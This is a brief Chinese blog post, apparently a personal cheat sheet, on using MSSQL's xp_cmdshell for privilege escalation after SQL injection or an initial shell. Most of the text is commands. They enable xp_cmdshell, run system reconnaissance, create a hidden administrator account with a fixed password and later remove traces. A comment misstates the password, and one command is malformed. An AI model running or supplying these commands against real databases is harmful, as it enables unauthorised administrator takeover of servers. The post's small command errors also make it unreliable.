MSSQL提权之xp_cmdshell

0x01 前提

  1. getshell或者存在sql注入并且能够执行命令。

  2. sql server是system权限,sql server默认就是system权限。

0x02 xp_cmdshell

有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开。

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

 

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

 

0x03 提权

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

 

 

 



select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

sp_configure 'show advanced options',1;
reconfigure;
go
sp_configure 'xp_cmdshell',1
reconfigure
go


exec master..xp_cmdshell "systeminfo"
exec master..xp_cmdshell "tasklist"


exec master..xp_cmdshell "NET USER"

exec master..xp_cmdshell "whoami"

exec master..xp_cmdshell 'net user masa pinohd123. /add'
exec master..xp_cmdshell 'net localgroup administrators masa /add'



exec master..xp_cmdshell 'net user masa  /delete'
exec master..xp_cmdshell 'net localgroup administrators masa /delete'

sp_configure 'xp_cmdshell',0
reconfigure
go

 

posted @ 2021-05-11 16:56  KJXY  阅读(5494)  评论(0)    收藏  举报